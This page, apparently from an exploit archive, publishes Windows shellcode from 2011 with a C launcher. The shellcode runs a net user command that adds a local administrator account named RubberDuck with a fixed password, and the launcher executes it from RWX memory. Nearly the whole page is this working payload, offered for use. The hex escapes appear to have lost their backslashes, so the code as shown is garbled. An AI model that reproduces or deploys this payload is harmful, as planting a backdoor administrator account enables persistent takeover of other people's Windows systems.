[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Allwin WinExec add new local administrator + ExitProcess Shellcode
# Published : 2011-05-25
# Author :
# Previous Title : Find all writeable folder in filesystem linux polymorphic shellcode - 91 bytes
# Next Title : ARM Polymorphic execve("/bin/sh", ["/bin/sh"], NULL) Shellcode Generator


/*
Title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 279 bytes
Date: 2011-05-25
Author: RubberDuck
Web: http://bflow.security-portal.cz
Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)
 -- command: cmd.exe /c net user RubberDuck mudbath /add && net localgroup administrators RubberDuck /add
 -- Username: RubberDuck
 -- Password: mudbath
*/

#include <stdio.h>
#include <windows.h>
 
int main(){
  unsigned char shellcode[]=
    "xFCx33xD2xB2x30x64xFFx32x5Ax8B"
    "x52x0Cx8Bx52x14x8Bx72x28x33xC9"
    "xB1x18x33xFFx33xC0xACx3Cx61x7C"
    "x02x2Cx20xC1xCFx0Dx03xF8xE2xF0"
    "x81xFFx5BxBCx4Ax6Ax8Bx5Ax10x8B"
    "x12x75xDAx8Bx53x3Cx03xD3xFFx72"
    "x34x8Bx52x78x03xD3x8Bx72x20x03"
    "xF3x33xC9x41xADx03xC3x81x38x47"
    "x65x74x50x75xF4x81x78x04x72x6F"
    "x63x41x75xEBx81x78x08x64x64x72"
    "x65x75xE2x49x8Bx72x24x03xF3x66"
    "x8Bx0Cx4Ex8Bx72x1Cx03xF3x8Bx14"
    "x8Ex03xD3x52x68x78x65x63x01xFE"
    "x4Cx24x03x68x57x69x6Ex45x54x53"
    "xFFxD2x6Ax05xEBx23xFFxD0x68x65"
    "x73x73x01x8BxDFxFEx4Cx24x03x68"
    "x50x72x6Fx63x68x45x78x69x74x54"
    "xFFx74x24x1CxFFx54x24x1Cx57xFF"
    "xD0xE8xD8xFFxFFxFFx63x6Dx64x2E"
    "x65x78x65x20x2Fx63x20x6Ex65x74"
    "x20x75x73x65x72x20x52x75x62x62"
    "x65x72x44x75x63x6Bx20x6Dx75x64"
    "x62x61x74x68x20x2Fx61x64x64x20"
    "x26x26x20x6Ex65x74x20x6Cx6Fx63"
    "x61x6Cx67x72x6Fx75x70x20x61x64"
    "x6Dx69x6Ex69x73x74x72x61x74x6F"
    "x72x73x20x52x75x62x62x65x72x44"
    "x75x63x6Bx20x2Fx61x64x64x00";
  LPVOID lpAlloc;
  void (*pfunc)();
 
  printf("size = %i bytesn", lstrlen(shellcode) + 1);
  printf("-------------------------nUsername: RubberDucknPassword: mudbathn");
  system("PAUSE");
 
  lpAlloc = VirtualAlloc(0, 4096,
                         MEM_COMMIT,
                         PAGE_EXECUTE_READWRITE);
 
  if(lpAlloc == NULL){
    printf("Memory not allocated!n");
    return 0;
  }
 
  memcpy(lpAlloc, shellcode, lstrlen(shellcode) + 1);
 
  pfunc = lpAlloc;
 
  pfunc();
 
  return 0;
}